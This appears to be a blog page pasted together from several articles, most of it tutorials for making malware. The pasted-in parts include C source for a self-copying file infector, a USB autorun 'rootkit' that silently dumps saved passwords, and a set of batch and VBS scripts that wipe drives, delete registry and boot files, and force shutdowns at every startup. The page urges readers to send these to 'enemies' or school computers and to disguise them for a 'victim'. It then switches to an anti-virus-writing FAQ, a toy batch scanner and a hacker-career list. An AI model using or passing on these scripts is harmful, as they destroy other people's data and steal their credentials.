Pages

Created By mian soban


Computer Technology Site

How to Create a Computer Virus?

Monday, 27 April 2015

How to Create a Computer Virus

This program is an example of how to create a computer virus in C language. This program demonstrates a simple virus program which when executed creates a copy of itself in all the other files that are present in the same directory.
Thus, it destroys other files by infecting them. The infected file will also become a virus so that when executed, it is capable of spreading the infection to another file and so on.




Here’s the source code of the virus program:
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0); //Search for a file with any extension (*.*)
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
This virus is designed to infect all types of files with any extension.
You can download the source code from the following link:

How the Virus Program Works?

The algorithm of this virus program is as follows:
Step-1: Search for files in the current directory. If one or more file is present, load the first file (target file).
Step-2: Load the copy of the virus itself onto the memory.
Step-3: Open the target file. Copy the virus code from the memory and place it in the target file. Close the target file when the copying process is completed.
Step-4: Load the next file to infect and move to the step-3. If all the files are infected, close all the open files, unload them from the memory and exit.
As far as the technical terms are concerned, I would not be able to explain the program line by line. Anyone with a working knowledge of C should be easily able to understand the functions and other terms used in the program.

How to Compile the Program:

For a step-by-step guide, you can refer my detailed post on how to compile C programs?

How to Test the Virus After the Compilation:

  1. Create a new empty folder.
  2. Put some executable files (or any other files) in the folder.
  3. Run the PC_Virus.exe file. With in a few seconds all the other files in the folder gets infected.
  4. Now every infected file is a new virus which is ready to re-infect. You can copy any of the infected .exe file to another empty folder and repeat the same procedure to see if the infected file is capable of re-infecting. Delete the folder and all the infected files after the testing process is done.

How to Hack Passwords Using A USB! [Guide]



We all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and a USB pen-drive, you can create your own rootkit to steal passwords from any computer. You need to follow these steps to make your own password stealing rootkits.
How To Prepare USB For Stealing ?
Note : You must temporarily disable your antivirus before following these steps.
  • Download the set of tools, extract them and copy only the (.exe files) onto your USB Pendrive.
  • Create a new Notepad and write the following text into it.
[autorun] open=launch.bat
ACTION= Perform a Virus Scan
  • Save the Notepad and rename it from New Text Document.txt to autorun.inf.
  • Copy the autorun.inf file onto your USB pen-drive.
  • Create another Notepad and write the following text in it.
start mspass.exe /stext mspass.txtstart mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
Direct Download Link
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
  • Save the Notepad and rename it from New Text Document.txt to launch.bat. Copy the launch.bat file to your USB drive.
Now our rootkit is ready and we are all set to sniff the passwords. You can use this pen-drive on on any computer to steal the stored passwords.
How To Steal The Password?

    1. Insert the pen-drive and the auto-run window will pop-up. (This is because, we have created an auto-run pen-drive).
    2. In the pop-up window, select the first option (Perform a Virus Scan).
    3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
    4. Remove the pen-drive and you’ll see the stored passwords in the .TXT files.
    5. Use The Passwords And Enoy :)

Make Some Useful & Dangerous Viruses In Notepad! [Guide]



Create Your Own Viruses
Today we will learn how to create simple but dangerous viruses using notepad. These are very simple to create and use, but don’t dare to use these on your computer because these viruses can destroy your personal information. Where to use? You can send these viruses to your enemies or if you wanna try it yourself best and my favorite place is school computers :D . Let’s get started.
How to make a virus ?
  1. Open Notepad
  2. Put The Codes Provided
  3. Save it in the correct extension
  4. Done
  • Wiper [Not Official Name But I call It]
Deletes everything in the computer’s drive



@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q
Save As “Your File Name.bat [Batch File]
  • Registry Deleter
Deletes everything stored in registry
@echo OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
  • No Access
A good Halloween prank for your friends this stops internet access of the user. To gain Access type IPconfig /renew in CMD
@echo off
Ipconfig /release
  • Shut Up
Send your friend a little message and shut down his computer
@echo off
msg * Lets Roll Baby
shutdown -c “Error! Your ass got glued!” -s
  • Crash Puter
This is simple virus that crashes the computer – [Save As Anything.VBS]
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next
  • Ez Formatter
This Simple Virus formats windows drives in less than 5 seconds. Only D,E And C drives.
rd/s/q D:\
rd/s/q C:\
rd/s/q E:\
  • Shutter
This virus can be very annoying it shutdowns computer every time the computer is turned on.
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You Are Nailed, Buy A New Computer This Is Piece Of Shit.
PAUSE
Now its time for few very dangerous viruses
  • Rest In Peace
It crashes PC once used the PC can’t be restarted.. It deletes everything necessary for starting up windows. Do not use on yourself .
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
  • Century
Shut downs the PC hundred times. To stop Start Run and type shutdown -a . You can also change the times pc restarts by replacing 100 by your choice.
Create a new shortcut and type :-
shutdown -s -t 100 c “Installing Updates”
  • RIP -2
This virus does the same It also prevents pc from starting but in an effective and better way.
del c:\WINDOWS\system32\*.*/q
  • Freak
This virus disables the internet forever
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You have maxed your internet usage for a lifetime :D
PAUSE

Now there are some smart guys who check the batch files in notepad before running it. No big deal. An effective way .
How to make those stuff work ?
  1. Download and run the converter.
  2. Inject your batch file
  3. Choose Icon
  4. Version and information
  5. Compile
  6. Send to your victim
  7. Enjoy :)

How do I create a computer virus?

How do I create a computer virus?

Computer VirusIf you are interested in creating a computer virus,Trojanwormmalware, or other malicious program as revenge, payback, or as a prank, we suggest you rethink. Creating a virus that deletes files or causes other issues resolves nothing and will result in prosecution by the law. In other words, you could be fined or sent to prison.
Instead of creating computer viruses or other malware, consider learning a computer programming language. You will learn a lot more by learning one or more programming languages and become more qualified in getting hired at a company that designs programs or analyzes viruses. No one ever got hired because they wrote a computer virus.

I only want to write a virus to learn how they work.

You will learn a lot more about how computer programs and viruses work by learning to program than you ever will by writing and tinkering with computer viruses. A computer virus is only a program designed to do malicious tasks on the computer, such as deleting files, inserting its code into other files, and copying itself to other places and computers accessible to the computer that is running the virus. By learning to program, you will not only know how these tasks are possible, but also learn much more.

I need to test my virus scanner.

You can create test virus files that can be used to test your computer's anti-virus scanner without having to create your own virus. See the link below for additional information and code on how to create a test virus.

If I create a good computer virus, I will be famous.

No, the only fame you may get is a brief news article or a picture of you being handcuffed and sent to prison. Once incarcerated, it will go on your record and make it next to impossible to get hired at any respectable computer company and impossible to get hired by any government agency.
If you were to write a computer virus that was successful, you would want to remain anonymous in fear of being prosecuted by the law. Also, if you think about it, almost everyone knows who Bill Gates is and what he has done for computers, but have no clue about Jeffrey Parson.

If I write a good virus, a security firm or antivirus company will hire me.

False, no respectable security firm or antivirus company wants to be affiliated with a virus or malware creator that infected potential customer computers. If you are interested in getting a job with a security firm or antivirus company, you have a much better chance learning to program, becoming a participant in security discussions, being a beta tester, or finding vulnerabilities in programs and reporting them to the developers. Companies such as Google will even pay good money to anyone who reports bugs or security vulnerabilities about any of their products.

In need details, examples, or other information about creating viruses.

Computer Hope will not send anyone any other additional information about creating computer viruses, worms, or Trojans. This document was only created to help deter people from creating computer viruses and learn computer programming instead.

What programming languages should I learn?

Programming languages such as CC++C#JavaPerlPHP, and Python are all good programming languages for new computer programmers. See the link below if you are not exactly sure what language to start learning first.

How to Make a Batch Antivirus

Do you want to make your own Batch antivirus that can detect Batch viruses and scan Batch files? There's a little bit complicated step for this.

Steps

  1. Make a Batch Antivirus Step 1 Version 2.jpg
    1
    Open Notepad
    Ad
  2. Make a Batch Antivirus Step 2 Version 2.jpg
    2
    Type the code at the next step:
    • @echo off
    • color cb
    • title Batch Antivirus
    • cls
    • echo ===============
    • echo [ Batch-Master]
    • echo ===============
    • echo If There's no message ,You are protected.
    • set /p a=Enter a batch file to scan:
    • for /f %%x in (
    • 'findstr /i /m "virus r.i.p byebye HaHaHa Hacked Hack" %a%.bat'
    • ) do (
    • if /i %%x equ %a%.bat (
    • for /f %%z in (
    • 'findstr /i /b /m "tskill del copy shutdown ipconfig ren reg" %a%.bat'
    • ) do (
    • if /i %%z equ %a%.bat (
    • cls
    • echo Virus Detected!!
    • del %a%.bat
    • echo %a%.bat was deleted....
    • pause >nul
    • )
    • )
    • )
    • )
    • pause >nul
  3. Make a Batch Antivirus Step 3 Version 2.jpg
    3
    Save this code as "antivirus.bat"
  4. Make a Batch Antivirus Step 4 Version 2.jpg

12 simple steps to become a hacker

Steps to become a hacker
Hacking is an engaging field but it is surely not easy. To become a hacker one has to have an attitude and curiosity of learning and adapting new skills. You must have a deep knowledge of computer systems, programming languages, operating systems and the journey of learning goes on and on. Some people think that a hacker is always a criminal and do illegal activities but they are wrong. Actually many big companies hire hackers to protect their systems and information and are highly paid. We have prepared a list of 12 most important steps necessary to become a hacker, have a deeper look

1. Learn UNIX/LINUX

linux operating system
UNIX/LINUX is an open source operating system which provides better security to computer systems. It was first developed by AT&T in Bell labs and contributed a lot in the world of security. You should install LINUX freely available open source versions on your desktops as without learning UNIX/LINUX, it is not possible to become a hacker.


2. Code in C language 

c programming
C programming is the base of learning UNIX/LINUX as this operating system is coded in C programming which makes it the most powerful language as compared to other programming languages. C language was developed by Dennis Ritchie in late 1970’s. To become a hacker you should master C language.

3. Learn to code in more than one Programming Language

programming languages

It is important for a person in the hacking field to learn more than one programming. There are many programming languages to learn such as Python, JAVA, C++. Free eBooks, tutorials are easily available online.

4. Learn Networking Concepts

computer networking
Another important and essential step to become a hacker is to be good at networking concepts and understanding how the networks are created. You need to know the differences between different types of networks and must have a clear understanding of TCP/IP and UDP to exploit vulnerabilities (loop holes) in system.
Understanding what LAN, WAN, VPN, Firewall is also important.
You must have a clear understanding and use of network tools such as Wireshark, NMAP for packet analyzing, network scanning etc.

5. Learn More Than One Operating Systems 

operating system
It is essential for a hacker to learn more than one operating system. There are many other Operating systems apart from Windows, UNIX/LINUX etc. Every system has a loop hole, hacker needs it to exploit it.

6. Learn Cryptography

cryptography encryption
To become a successful hacker you need to master the art of cryptography. Encryption and Decryption are important skills in hacking. Encryption is widely done in several aspects of information system security in authentication, confidentiality and integrity of data. Information on a network is in encrypted form such as passwords. While hacking a system, these encrypted codes needs to be broken, which is called decryption.

7. Learn more and more about hacking

hacking or hackers
Go through various tutorials, eBooks written by experts in the field of hacking. In the field of hacking, learning is never ending because security changes every day with new updates in systems.

8. Experiment A Lot

experiment
After learning some concepts, sit and practice them. Setup your own lab for experimental purpose. You need a good computer system to start with as some tools may require powerful processor, RAM etc. Keep on Testing and learning until you breach a system.

9. Write Vulnerability (Loop hole program)

hacking vulnerability

Vulnerability is the weakness, loop hole or open door through which you enter the system. Look for vulnerabilities by scanning the system, network etc. Try to write your own and exploit the system.


10. Contribute To Open Source Security Projects

open source software
An open source computer security project helps you a lot in polishing and testing your hacking skills. It’s not a piece of cake to get it done. Some organizations such as MOZILLA, APACHE offer open source projects. Contribute and be a part of them even if your contribution is small, it will add a big value to your field.

11. Continue never ending Learning 

learning hacking
Learning is the key to success in the world of hacking. Continuous learning and practicing will make you the best hacker. Keep yourself updated about security changes and learn about new ways to exploit systems

12. Join Discussions and meet hackers 

discussion
Most important for a hacker is to make a community or join forums, discussions with other hackers worldwide, so that they can exchange and share their knowledge and work as a team. Join Facebook groups related to hacking where you can get more from experts.
 

Most Reading